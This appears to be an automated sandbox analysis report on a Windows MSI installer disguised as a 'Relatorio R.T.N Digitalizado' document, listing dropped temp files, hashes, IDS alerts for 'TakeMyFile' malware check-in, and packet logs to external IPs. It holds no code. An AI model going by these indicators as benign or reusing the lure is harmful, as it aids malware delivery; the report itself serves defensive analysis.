Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFD4E7A9BE5D501E6D.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07402134451337501
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOMfDiA5bSwt9epOtf/ltKVky6l1:2F0i8n0itFzDHFwiAQwSpOt/p1
MD5:	A28B4453AF962CA5E246023DE1301495
SHA1:	43620890A539880D1151FA118A4BC7E9675F53D8
SHA-256:	999AD08DCC61E24D64AAA6036FAC79BF7F3EA0E60DA8C0177CBE54D41D6ACA0A
SHA-512:	549C4840D07F58DBC6447A737754F4DD48FD2E54A14B3C1CA4CA785058038D1DD68607ACB2D37C36412B43D7BD23E8FDA38489140A0FFF24D33F06F5703E730A
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFEA43F6F6C397E9BB.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	1.2339058027411036
Encrypted:	false
SSDEEP:	48:5Ql8uaGI+CFXJJT55UVy/GtTpeayVBSKyV/AEKgCyc8k78xqo8x4swXGcp4ru2xq:K8XhT38VnA1kCuk87K4GcJ
MD5:	042DAFA9CB0B67C7FC88A3F0FFAF50D0
SHA1:	F9C30BBD2A26E9DF3776E2E2CF2BA20F08274DC9
SHA-256:	E074CF0EE7F61DD7A6859D9CF9117FA252D8A32BF153AF80260C7D7D5732EE9E
SHA-512:	B407E4A3EB4120E7468B1902FFB6ABF16A3ABDC9624727161FC6E27671180950293C112BC899385357D607465C51B1499AF50D7DFF83117E89E1AE4106F16516
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFFE36C02E90A8A2EF.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	1.2339058027411036
Encrypted:	false
SSDEEP:	48:5Ql8uaGI+CFXJJT55UVy/GtTpeayVBSKyV/AEKgCyc8k78xqo8x4swXGcp4ru2xq:K8XhT38VnA1kCuk87K4GcJ
MD5:	042DAFA9CB0B67C7FC88A3F0FFAF50D0
SHA1:	F9C30BBD2A26E9DF3776E2E2CF2BA20F08274DC9
SHA-256:	E074CF0EE7F61DD7A6859D9CF9117FA252D8A32BF153AF80260C7D7D5732EE9E
SHA-512:	B407E4A3EB4120E7468B1902FFB6ABF16A3ABDC9624727161FC6E27671180950293C112BC899385357D607465C51B1499AF50D7DFF83117E89E1AE4106F16516
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {BB4407C3-4E7B-444C-908C-2ED061F6B530}, Number of Words: 10, Subject: Relatorio R.T.N Digitalizado, Author: Relatorio R.T.N Digitalizado, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1033, Comments: Relatorio R.T.N Digitalizado, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
Entropy (8bit):	6.622022994001013
TrID:	Microsoft Windows Installer (77509/1) 52.18% Windows SDK Setup Transform Script (63028/2) 42.43% Generic OLE2 / Multistream Compound File (8008/1) 5.39%
File name:	AOEI-LEHOLLZCZW.msi
File size:	3409408
MD5:	0e079de8e9f5c8df67e4e045797214f8
SHA1:	d7f79a99e513b70e18497dd5c049b180790e0fa3
SHA256:	41d756c67066d30c6deaab2de7ecb02b9e1eee8e7ef41c4a9948e8549b2973da
SHA512:	beffac32cb3e2e7cfdae54977aee8fee662cdba88b6ca57a4de3ec471cfd2a7838c1fbb153f1fa935643289b104b794df1d117cf7b191779e3eb3a586c346752
SSDEEP:	49152:uiDxGSFVtaNXAZK8tKk5ojmrhCMz5vk3ukDln/hFRFNUEekBZWsRkn4frUMXjDt3:HxMXA9Kknz5vquVsRe4frUMXjTY
TLSH:	F9F52B0532C9A571D75F9A7A7A3BE1F5F17A2DD123A000CBB3547C58E8B0385A6A1F32
File Content Preview:	........................>...................5...................................................................................................................I...J...K...L...M...N...O...P...Q...R...S...T..................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.354.205.202.3149698802849814 01/05/23-13:18:31.506567	TCP	2849814	ETPRO MALWARE TakeMyFile User-Agent	49698	80	192.168.2.3	54.205.202.31
192.168.2.354.205.202.3149698802849813 01/05/23-13:18:31.506567	TCP	2849813	ETPRO MALWARE TakeMyFile Installer Checkin	49698	80	192.168.2.3	54.205.202.31

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2023 13:18:08.797281027 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:08.797324896 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:08.797409058 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:08.806134939 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:08.806157112 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.258354902 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.258455992 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.262048960 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.262063980 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.264796972 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.386214972 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.493309021 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.493356943 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.657737970 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.657866001 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.657963991 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.657987118 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.658051968 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.802800894 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.802836895 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.802903891 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.802942991 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.802961111 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.803009987 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.803028107 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.803065062 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.803066969 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.803093910 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.803106070 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.803114891 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.803143024 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.803157091 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.803189993 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.803195000 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.803219080 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.803273916 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.803328991 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.870724916 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.947716951 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.947757006 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.947845936 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.947870016 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.947959900 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.947984934 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.948000908 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.948034048 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.948040962 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.948054075 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.948071003 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.948101997 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.948117971 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.948148966 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.948267937 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.948312998 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.948452950 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.948467016 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.948515892 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.991369009 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.991405010 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.991453886 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.991573095 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:09.991606951 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:09.991626978 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.092679977 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.092716932 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.092782974 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.092814922 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.092835903 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.092953920 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.092998028 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093015909 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093029022 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093039036 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093054056 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093060970 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093075037 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093089104 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093247890 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093277931 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093310118 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093324900 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093348026 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093533039 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093569040 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093606949 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093620062 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093652964 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093682051 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093862057 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093883991 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093921900 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093938112 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.093952894 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.093970060 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.094172001 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.094219923 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.094239950 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.094257116 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.094285011 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.135848045 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.135943890 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.136018991 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.136080027 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.136104107 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.136126995 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.136168957 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.136271000 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.236934900 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.236974955 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.237059116 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.237356901 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.237375975 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.237509966 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.238600016 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.238626003 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.238701105 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.238804102 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.238814116 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.238920927 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.238940954 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.238962889 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239006996 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239056110 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.239063978 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239142895 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.239274979 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239303112 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239363909 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239387035 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.239398003 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239464998 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.239578009 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239578962 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.239597082 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239623070 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239674091 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239686012 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.239698887 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239751101 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.239877939 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.239895105 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.240066051 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.240080118 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.240247011 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.240277052 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.240364075 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.240377903 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.240453959 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.240535975 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.240556955 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.240649939 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.240665913 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.240756989 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.240909100 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.240932941 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.240953922 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241017103 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241044044 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.241053104 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241142035 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.241288900 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241312981 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241344929 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241394997 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.241409063 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241491079 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.241601944 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241624117 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241667986 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241708040 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.241719961 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.241812944 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.241997957 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.242053032 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.242074013 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.242101908 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.242152929 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.242165089 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.242249012 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.242538929 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.243307114 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.280697107 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.280802965 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.280925989 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.280975103 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.281013966 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.281075954 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.281313896 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.281362057 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.281425953 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.281439066 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.281497955 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.281522989 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.281529903 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.281836987 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.281893969 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.281922102 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.281938076 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.281985044 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.370814085 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.370868921 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.380728006 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.380779982 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.380863905 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.380893946 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.380950928 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.380996943 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.381052971 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.382832050 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.382858992 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.382960081 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.382987976 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.384144068 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.384176970 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.384258986 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.384283066 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.384305954 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.384865046 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.384886980 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.384968042 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.384983063 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.385016918 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.386075020 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386127949 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386217117 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.386235952 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386298895 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.386342049 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386364937 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386409044 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.386421919 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386451960 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.386754990 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386802912 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386841059 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386847973 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.386857986 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.386892080 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.386929035 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.387043953 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.387069941 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.387120008 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.387125015 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.387137890 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.387168884 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.387274027 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.387300968 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.387366056 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.387378931 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.387567997 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.387588978 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.387818098 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.387830019 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388118982 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388149023 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388268948 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.388283014 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388394117 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388415098 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388457060 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.388470888 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388504982 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.388633013 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388676882 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388698101 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.388710022 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.388744116 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.388781071 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.389273882 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.389302015 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.389354944 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.389400959 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.389415026 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.389451027 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.389497042 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.389518023 CET	443	49691	52.217.160.129	192.168.2.3
Jan 5, 2023 13:18:10.389556885 CET	49691	443	192.168.2.3	52.217.160.129
Jan 5, 2023 13:18:10.389570951 CET	443	49691	52.217.160.129	192.168.2.3
